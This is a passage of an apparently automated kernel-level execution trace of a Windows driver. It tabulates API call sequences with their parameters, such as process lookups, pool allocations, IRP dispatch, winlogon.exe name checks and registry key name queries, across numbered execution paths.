| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff800010b0, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff800010b0, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff800010b0, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff800010b0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x48007 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a763a6c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044807f40 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003c831cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044807f40, MemoryDescriptorList_unk_out = 0xffffe00044807f40 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003c831cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003c831cf0, Irp_unk_out = 0xffffe0003c831cf0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe00044807f40 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a766010 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80001098, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001098, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001098, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80001098, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x48006 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76618c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044807f40 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003c831cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044807f40, MemoryDescriptorList_unk_out = 0xffffe00044807f40 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003c831cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c831cf0, Irp_unk_out = 0xffffe0003c831cf0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe00044807f40 |
Execution Path #19 (length: 23, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 23 |
Processes
»
| Process | Count |
|---|---|
| Process 7 (svchost.exe, PID: 888) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsGetCurrentProcessId | ret_val_unk_out = 0x378 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a76fb90 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x378, Process_unk_out = 0xffffd0002aa70570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003bd9b5c0, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002aa70528, Handle_out = 0xffffffff80000870, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000870, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002aa70520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000870, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002aa70520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000870, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003bd9b5c0, ret_val_ptr_out = 0x400b9 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76fd0c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b494460 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002aa70370, ret_val_unk_out = 0xffffe0003b7c9cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b494460, MemoryDescriptorList_unk_out = 0xffffe0003b494460 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003b7c9cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b494460 |
Execution Path #24 (length: 12, count: 2, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 12 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d296eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c831cf0, Irp_unk_out = 0xffffe0003c831cf0, ret_val_out = 0x103 |
Execution Path #27 (length: 238, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 238 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
